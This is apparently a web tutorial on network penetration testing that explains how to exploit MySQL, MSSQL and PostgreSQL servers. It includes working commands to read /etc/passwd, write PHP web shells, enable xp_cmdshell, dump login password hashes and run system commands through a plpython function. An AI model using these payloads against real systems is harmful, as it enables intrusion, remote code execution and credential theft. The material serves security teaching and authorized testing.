Home > Network Pentesting

Database Exploits

Database exploits target weaknesses in database servers, configurations, authentication, and query execution. After enumeration reveals versions, users, databases, and permissions, exploitation focuses on gaining unauthorized access, reading sensitive data, escalating privileges, or achieving remote code execution. MySQL, MSSQL, and PostgreSQL each expose unique attack surfaces depending on configuration and version.

Understanding Database Attack Surface

Common weaknesses across databases include:

  • Default or weak credentials

  • Excessive user privileges

  • Exposed internal functions

  • Outdated or vulnerable versions

  • Trust authentication settings

  • Arbitrary file read or write capabilities

  • Misconfigured remote access

  • Unsafe stored procedures

  • SQL functions that execute system commands

Exploitation combines authentication flaws, configuration weaknesses, and protocol behavior.

Exploiting MySQL

MySQL often suffers from weak authentication, open remote access, and permission issues.

Exploiting Weak or No Passwords

mysql -h 10.10.10.5 -u root

If login succeeds without a password, the server is severely misconfigured.

Privilege Escalation via FILE Privilege

If a user has FILE privileges, MySQL can read or write system files.

Reading System Files

SELECT LOAD_FILE('/etc/passwd');

This reveals sensitive files if permissions allow it.

Writing Web Shells (When FTP or Webroot Mapped and Allowed in Scope)

SELECT "<?php system($_GET['cmd']); ?>" INTO OUTFILE '/var/www/html/shell.php';

Writable locations allow remote code execution through the web server.

Gaining Command Execution (UDF Exploitation)

Older MySQL versions allow creating custom functions.

Steps include:

  • Uploading a malicious shared object

  • Creating a UDF function linked to system commands

  • Executing operating system commands via SQL

This technique works only on outdated and misconfigured servers.

Exploiting MSSQL

MSSQL integrates with Windows authentication and Active Directory. Misconfigurations often expose powerful stored procedures.

Exploiting xp_cmdshell

If xp_cmdshell is enabled, attackers can execute system commands.

Checking xp_cmdshell status:

EXEC sp_configure 'xp_cmdshell';

Enabling it (only if privileged and allowed):

EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;

Executing commands:

EXEC xp_cmdshell 'whoami';

This grants command execution as the SQL Server account.

Using Impacket for Remote Code Execution

mssqlclient.py user@10.10.10.5 -windows-auth

If xp_cmdshell is enabled, pentesters escalate to full system access.

Abuse of Linked Servers

MSSQL environments often have linked servers between hosts.

Checking linked servers:

EXEC sp_linkedservers;

If misconfigured, attackers may pivot using the privileges of remote SQL servers.

Extracting Credentials

MSSQL stores hashes that can be extracted with sufficient privileges.

SELECT name, password_hash FROM sys.sql_logins;

Hashes may be cracked offline.

Exploiting PostgreSQL

PostgreSQL supports trust authentication and file access through COPY commands.

Abusing Trust Authentication

If pg_hba.conf allows trust authentication:

psql -h 10.10.10.5 -U postgres

Login succeeds without a password.

Reading Files via COPY

COPY config_file FROM '/etc/passwd';

PostgreSQL can read files from the host depending on permissions.

Writing Files via COPY

COPY (SELECT '<?php system($_GET["cmd"]); ?>') TO '/var/www/html/shell.php';

Writable file paths allow remote code execution.

Command Execution via Extensions

PostgreSQL supports extensions such as:

  • plpython

  • plperl

  • plpgsql

If superuser access is available, pentesters can create functions that execute system commands.

Example:

CREATE FUNCTION exec_cmd(text) RETURNS text AS $$
import subprocess
return subprocess.check_output(args[0], shell=True)
$$ LANGUAGE plpythonu;

Executing commands:

SELECT exec_cmd('id');

Extensions require high privilege levels.

Exploiting Default Credentials

Many database servers deploy with default passwords.

Common examples:

  • MySQL root with no password

  • MSSQL sa with weak password

  • PostgreSQL postgres with default access

Credential spraying across databases often reveals weak setups.

Exploiting Outdated or Vulnerable Versions

Database servers frequently contain version-specific vulnerabilities.

Examples include:

  • MySQL privilege escalation flaws

  • MSSQL remote code execution issues

  • PostgreSQL authentication bypass vulnerabilities

Pentesters match version data with public CVEs after enumeration.

Exploiting Remote Access Misconfigurations

Databases that allow external connections from any host are exposed.

Checking bind interfaces:

bind-address = 0.0.0.0

This configuration allows remote attacks from outside the network.

Why Database Exploitation Matters

Databases store sensitive information such as credentials, business data, logs, API keys, and user information. Exploiting misconfigurations or vulnerabilities often results in:

  • Unauthorized data access

  • System-level remote code execution

  • Credential harvesting

  • Lateral movement

  • Full environment compromise

Databases are high-value targets, and weak configurations often make them accessible during network pentests.

Intel Dump

  • Database exploits target weak credentials, misconfigurations, outdated versions, and unsafe file access

  • MySQL supports FILE read/write and UDF-based execution

  • MSSQL exposes xp_cmdshell, linked servers, and NTLM-based authentication

  • PostgreSQL can read/write files via COPY and run commands via extensions

  • Remote access misconfigurations expose databases to unauthorized attacks

  • Database exploitation often yields full system compromise

HOME LEARN COMMUNITY DASHBOARD